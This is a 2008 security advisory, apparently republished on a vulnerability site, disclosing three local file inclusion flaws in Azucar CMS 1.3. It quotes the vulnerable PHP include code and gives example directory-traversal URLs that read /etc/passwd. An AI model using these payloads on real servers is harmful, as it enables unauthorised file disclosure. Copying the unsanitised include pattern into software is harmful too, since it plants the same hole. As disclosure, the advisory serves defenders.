Multiple LFI in Azucar CMS 1.3

2008.02.07
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-98


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Digital Security Research Group [DSecRG] Advisory #DSECRG-08-012 Application: Azucar CMS Versions Affected: 1.3 Vendor URL: http://azucarcms.sourceforge.net/en_home.htm Bug: Multiple Local File Include Exploits: YES Reported: 30.01.2008 Vendor Response: NONE Date of Public Advisory: 05.02.2008 Authors: Alexandr Polyakov, Stas Svistunovich Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *********** Azucar CMS has Multiple Local File Include vulnerabilities. 1. Local File Include vulnerabilities found in scripts index.php and index_sitios.php Code **** ################################################# if (isset($_GET[_VIEW]) && ereg("^src|^vistas", $_GET[_VIEW])) include($_GET[_VIEW]); else header("Location: html/sitio/"); ################################################# Example: http://[server]/[installdir]/index.php??view=src/sistema/vistas/../../.. /../../../../../../../../../../etc/passwd 2. Local File Include vulnerability found in script src/sistema/vistas/template/tpl_inicio.php Code **** ################################################# $vista = (isset($_GET[_VIEW])) ? $_GET[_VIEW] : PATH_PROYECTO . 'vistas/index.php'; include($vista); ################################################# Example: http://[server]/[installdir]/src/sistema/vistas/template/tpl_inicio.php? _VIEW=../../../../../../../../../../../../../etc/passwd 3. Local File Include vulnerability found in script html/sitio/index.php Code **** ################################################# if (isset($_GET[_VIEW])) { if (!file_exists($_GET[_VIEW])) { $vista_array = explode('/', $_GET[_VIEW]); $vista = $vista_array[0] . '/es_ES/' . $vista_array[2]; } else $vista = $_GET[_VIEW]; } $vista = (isset($_GET[_VIEW]) && ereg("^src|^vistas", $_GET[_VIEW])) ? $vista : PATH_PROYECTO . 'vistas/es_ES/index.php'; include($vista); ################################################# Example: http://[server]/[installdir]/html/sitio/index.php?view=vistas/../../../. ./../../../../../../../../../etc/passwd About ***** Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact: research [at] dsec [dot] ru http://www.dsec.ru (in Russian)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top